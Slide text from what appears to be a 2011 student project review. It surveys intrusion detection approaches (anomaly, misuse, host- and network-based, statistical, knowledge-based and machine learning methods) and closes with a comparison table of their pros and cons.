You are on page 1of 11

LITERATURE SURVEY(cont)

Intrusion Detection Systems (IDS)

monitors network and/or system activities for malicious activities or policy violations and produces reports to a Management Station
Classification on the basis of detection approaches[12]
anomaly detection misuse detection

Oct 28,2011

Project Review

LITERATURE SURVEY(cont)
Anomaly detection[13] To capture any deviation from the profiles of normal behavior pattern unknown or novel attacks well-known attacks may not be detected

Misuse detection

based on the knowledge of system vulnerabilities known attack patterns compares recent activity to known intrusion scenarios Oct 28,2011trained to detect Project Review

LITERATURE SURVEY(cont)
Classification on the basis of Placement of IDS[14]
Host-based intrusion detection Network-based intrusion detection
Host-based intrusion detection single host monitors the activities of a single host

Network-based intrusion detection In Network monitors the network for malicious traffic
Oct 28,2011 Project Review 4

LITERATURE SURVEY(cont)
Classification on the basis of functional characterization of detection
Statistical based techniques Knowledge based techniques Machine learning based techniques

Statistical based techniques[16]


Define normal or expected behavior by collecting data search for unusual behavior detect new attacks and vulnerabilities in the system high false alarm is drawback
Project Review 5

Oct 28,2011

LITERATURE SURVEY(cont)
Knowledge based techniques[15] knowledge accumulated from various known attacks and system vulnerabilities detect intrusions which are defined previously in the knowledge base difficult to update the IDS Machine learning based techniques
uses the hypothesis model that enables the pattern analyzed to be categorized to improve the performance of search and data analysis data reduction and classification resource expensive nature
Project Review 6

Oct 28,2011

LITERATURE SURVEY(cont)
Classification of Machine learning based IDS

Bayesian networks [18]


encodes probabilistic relationships combination with statistical schemes highly dependent on the assumptions similar to threshold-based systems deviation in these hypotheses

Oct 28,2011

Project Review

LITERATURE SURVEY(cont)
Markov models[20][19]
a set of states that are interconnected probabilities associated to the transitions are estimated comparing the anomaly score obtained for the observed sequences with a fixed threshold. context of host IDS

Oct 28,2011

Project Review

LITERATURE SURVEY(cont)
Neural networks[32]
field of anomaly intrusion detection employed to create user profiles, flexibility and adaptability to environmental changes

Genetic algorithms[25][27]
global search heuristics classification rules and selecting appropriate features or optimal parameters use of a flexible and robust global search method high resource consumption

Oct 28,2011

Project Review

LITERATURE SURVEY(cont)
Clustering and outlier detection
grouping the observed . each new data point is classified Some points may not belong to any cluster raw audit data

Oct 28,2011

Project Review

10

COMPARSION
Technique Behavioral based Pros Prior knowledge about normal activity not required. Accurate notification of malicious activities. Cons Susceptible to be trained by attackers. Difficult setting for parameters and metrics. Unrealistic quasi-stationary process assumption. Knowledge based Robustness. scalability Flexibility and Difficult and time-consuming availability for high-quality knowledge/data. Machine learning based Flexibility and adaptability. Capture of interdependencies High dependency on the assumption about the behavior accepted for the system. High resource consuming.

Oct 28,2011

Project Review

11